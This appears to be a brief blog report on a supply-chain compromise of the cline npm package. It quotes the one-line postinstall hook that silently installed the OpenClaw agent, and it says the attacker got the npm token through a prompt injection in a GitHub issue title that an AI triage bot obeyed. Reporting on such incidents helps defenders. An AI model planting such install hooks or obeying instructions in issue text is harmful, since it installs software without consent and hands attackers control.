Skip to main content

Search This Blog

chatainews

Cline

Get link
Facebook
X
Pinterest
Email
Other Apps

On February 17, 2026, someone published cline@2.3.0 to npm. The CLI binary was byte-identical to the previous version. The only change was one line in package.json: "postinstall": "npm install -g openclaw@latest" For the next eight hours, every developer who installed or updated Cline got OpenClaw - a separate AI agent with full system access - installed globally on their machine without consent. Approximately 4,000 downloads occurred before the package was pulled1. The interesting part is not the payload. It is how the attacker got the npm token in the first place: by injecting a prompt into a GitHub issue title, which an AI triage bot read, interpreted as an instruction, and executed.

Get link
Facebook
X
Pinterest
Email
Other Apps

Comments

Post a Comment

Empathy recommended

Powered by Blogger

Theme images by Galeries

janggolan: (-‿-)

Archive

March 202615
February 202671
January 202637
December 2025110
November 202576
October 202571
September 202552
August 2025101
July 202593
June 2025212

May 2025132
April 2025117
March 202596
February 2025139
January 2025140
December 202475
November 202457
October 202454
September 2024100
August 2024121
July 2024143
June 2024122
May 2024166
April 2024168
March 2024170
February 2024168
January 2024200
December 2023177
November 202313

Show more Show less

Report Abuse